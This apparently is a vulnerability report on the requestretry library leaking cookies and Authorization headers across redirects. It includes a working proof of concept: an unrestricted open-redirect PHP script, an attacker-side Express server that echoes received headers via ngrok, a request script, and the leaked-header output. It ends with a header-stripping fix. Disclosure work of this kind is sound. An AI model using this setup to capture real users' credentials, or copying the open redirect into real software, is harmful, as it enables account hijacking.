> Reported on Feb 10 2022 | Timothee Desurmont
Vulnerability type: CWE-200
Cookies are leaked to external sites.
request(`${mysite}/redirect.php?url=${attacker}/`, options)
When fetching a redirecting URL whose url parameter (?url=${attacker}) points to an external site, the user's cookies are leaked to the third-party application:
{
  headers: {
    host: '304e-92-98-215-185.ngrok.io',
    cookie: 'ajs_anonymous_id=1234567890"',
    referer:
      'http://192.168.2.31/redirect.php?url=http://304e-92-98-215-185.ngrok.io/',
    'x-forwarded-for': '92.98.215.185',
    'x-forwarded-proto': 'http',
    'accept-encoding': 'gzip'
  }
}
Headers should be "sanitized" before the redirect is followed.
We will run an Apache server on port 80 that redirects all incoming requests to the URL given in the url parameter (mysite).
We will run an Express.js server on port 3000 that represents the external site (attacker).
To prove that cookies are leaked to external sites, the attacker URL needs to be on a different host than mysite; we will use ngrok to create a tunnel to port 3000 and obtain an internet address for the attacker site.
Create the redirect script in /var/www/html/:
<?php
// /var/www/html/redirect.php
// Test helper for the PoC: redirects every request to whatever URL is passed in ?url=
// (intentionally unrestricted so the redirect can point at the attacker host).
$url = $_GET["url"];
header("Location: $url");
exit;
?>
sudo apt-get update
sudo apt-get install php libapache2-mod-php
sudo systemctl restart apache2
// ~/test/server.js
// Attacker-side server: echoes back every header it receives.
const express = require('express');
const app = express();
app.get('/', function (req, res) {
  console.log(req.headers);
  res.status(200).json({ "headers": req.headers });
});
app.listen(3000);
console.log('listening on port 3000');
npm install express
node server.js
sudo apt-get install -y ngrok-server
ngrok http 3000
Session Status online
Account Timothee Desurmont (Plan: Free)
Update update available (version 2.3.40, Ctrl-U to update)
Version 2.3.35
Region United States (us)
Web Interface http://127.0.0.1:4040
Forwarding http://304e-92-98-215-185.ngrok.io -> http://localhost:3000
Forwarding https://304e-92-98-215-185.ngrok.io -> http://localhost:3000
Do not forget to replace the mysite URL with your local IP and the attacker URL with the one provided by ngrok.
// ~/test/poc.js
var request = require('requestretry');
const mysite = "http://192.168.2.31";
const attacker = "http://304e-92-98-215-185.ngrok.io";
const options = {
  method: 'GET',
  headers: {
    'Content-Type': 'application/json',
    'Cookie': 'ajs_anonymous_id=1234567890"',
    "Authorization": "Bearer eyJhb12345abcdef"
  }
};
request(`${mysite}/redirect.php?url=${attacker}/`, options)
  .then(function (response) {
    console.log(JSON.parse(response.body));
  })
  .catch(function (error) {
    console.log(error);
  });
npm install requestretry
node poc.js
The request from poc.js is redirected by our Apache server (mysite) to the Express.js server (the attacker's site), which then sends the received headers back as its response. We can see that the victim's Cookie header has been leaked to the attacker.
{
  headers: {
    host: '304e-92-98-215-185.ngrok.io',
    cookie: 'ajs_anonymous_id=1234567890"',
    referer:
      'http://192.168.2.31/redirect.php?url=http://304e-92-98-215-185.ngrok.io/',
    'x-forwarded-for': '92.98.215.185',
    'x-forwarded-proto': 'http',
    'accept-encoding': 'gzip'
  }
}
Access Control: hijack of the victim's account.
The attacker can steal the user's credentials and then use them to access the legitimate website.
If the redirect target is on a different domain than the original URL, the Cookie header should be removed before the redirected request is sent.
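One way to implement that check on the client side, as an added example that is not part of the report or of requestretry's own code: before following a redirect, compare the origin of the original request with the resolved Location target and drop credential-bearing headers when they differ. The header names and sample values are those of the PoC above; isSameOrigin and headersForRedirect are hypothetical helper names, and Authorization is dropped alongside Cookie because it carries the same kind of secret.

```javascript
// Added example (not from the report or requestretry): strip credential-bearing
// headers when a redirect leaves the origin of the original request.

// Headers that must not travel to a different origin on redirect.
const SENSITIVE_HEADERS = ['cookie', 'authorization', 'proxy-authorization'];

// Resolve the Location header against the request URL (Location may be relative)
// and report whether scheme, host and port are unchanged.
function isSameOrigin(requestUrl, location) {
  const from = new URL(requestUrl);
  const to = new URL(location, requestUrl);
  return from.origin === to.origin;
}

// Headers to send with the redirected request: the original set when the origin
// is unchanged, otherwise a copy with the sensitive headers removed
// (matched case-insensitively, since header names are case-insensitive).
function headersForRedirect(requestUrl, location, headers) {
  if (isSameOrigin(requestUrl, location)) {
    return { ...headers };
  }
  const sanitized = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!SENSITIVE_HEADERS.includes(name.toLowerCase())) {
      sanitized[name] = value;
    }
  }
  return sanitized;
}

// Constructed reproduction of the report's scenario: the PoC's request headers
// and the Location that redirect.php returns for the attacker host.
const pocHeaders = {
  'Content-Type': 'application/json',
  'Cookie': 'ajs_anonymous_id=1234567890"',
  'Authorization': 'Bearer eyJhb12345abcdef'
};
const mysite = 'http://192.168.2.31';
const attacker = 'http://304e-92-98-215-185.ngrok.io';

// Cross-origin redirect: only Content-Type survives.
console.log(headersForRedirect(`${mysite}/redirect.php?url=${attacker}/`, `${attacker}/`, pocHeaders));
// Same-origin relative redirect: all headers are kept.
console.log(headersForRedirect(`${mysite}/login`, '/home', pocHeaders));
```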